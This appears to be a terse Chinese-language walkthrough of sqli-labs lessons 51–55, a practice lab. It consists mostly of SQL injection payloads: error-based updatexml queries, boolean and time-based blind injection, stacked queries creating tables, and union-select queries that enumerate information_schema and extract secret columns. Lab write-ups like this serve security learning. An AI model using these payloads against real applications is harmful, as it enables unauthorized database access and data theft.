sqli-labs lesson51-55

1.lesson-51 报错注入

判断注入：

单引号注入

查数据库：

?sort=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +

宽字节注入：

?sort=1';create table h like users;-- +

2.lesson-52 布尔盲注

判断注入：

整型注入

时间或布尔盲注

布尔盲注：

判断数据库长度：

?sort=rand(length(database())=8)

为true，也就是1时：

为flase，也就是0时

时间盲注：

判断数据库长度：

?sort=1 and if(length(database())=8,sleep(0.5),1)

宽字节注入：

?sort=1; create table l like users;

3.lesson-53 时间盲注

判断注入：

单引号注入

时间盲注

判断数据库长度：

?sort=1 and if(length(database())=8,sleep(0.5),1)

宽字节注入：

?sort=1';create table k like users;-- +

4.lesson-54 union select

无报错，需要在10次中完成注入，报错不可用，盲注不可用，只能用union select联合注入

?id=1'
?id=1'-- +
?id=-1' union select 1,2,3-- +

数据库已经告诉了是challenges

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'-- +
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='zjmwu32rzm'-- +

?id=-1' union select 1,2,secret_I83C from challenges.zjmwu32rzm-- +

5.lesson-55 union select

无报错

?id=1'
?id=1'-- +
?id=1')-- +
?id=1'))-- +
?id=1")-- +
?id=1"))-- +
?id=1)-- +
?id=-1) union select 1,2,3-- +
?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'-- +
?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='o0jl7csbgc'-- +
?id=-1) union select 1,2,secret_8RJW from challenges.o0jl7csbgc-- +